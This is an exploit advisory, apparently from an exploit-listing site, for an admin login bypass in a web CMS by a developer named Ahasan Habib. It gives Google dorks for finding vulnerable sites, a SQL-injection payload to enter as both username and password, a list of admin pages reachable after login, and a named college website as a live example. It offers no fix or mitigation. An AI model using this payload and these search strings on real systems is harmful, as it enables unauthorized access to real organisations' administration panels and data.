Design & Development World IT Expert Ahasan Habib Admin Login Bypass Vulnerability

2018.07.07
Risk: Medium
Local: No
Remote: Yes
CVE: N/A

################################################################################################# # Exploit Title : Design & Development World IT Expert Ahasan Habib Admin Login Bypass Vulnerability # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army # Date : 07/07/2018 # Vendor Homepage : worlditexpert.com # Tested On : Windows # Category : WebApps # Exploit Risk : Medium # CWE : CWE-592 [ Authentication Bypass Issues ] + CWE-264 [ Permissions, Privileges, and Access Controls ] ################################################################################################# # Google Dorks : intext:''Design & Development World IT Expert'' site:bd intext:''© Develop By: Ahasan Habib'' # Administration Control Panel Path : /admin # Exploit : Username : '=''or' Password : '=''or' Useable Administration Control Panel URL Links => /admin/home.php /admin/routine.php /admin/syllabus.php /admin/notice.php /admin/teacher.php /admin/view_teacher.php /admin/department.php /admin/pages_timeline.html /admin/view_result.php /admin/insert_result.php /admin/creat_menu.php /admin/creat_sub_menu.php /admin/gallery.html /admin/tables.html /admin/maps.html /admin/subject.php /admin/blank.html /admin/blank2.html /admin/login.html ################################################################################################# # Example Site => mrahamancollegepanchagarh.edu.bd => [ Proof of Concept ] => archive.is/T8IdV ################################################################################################# # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team #################################################################################################


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top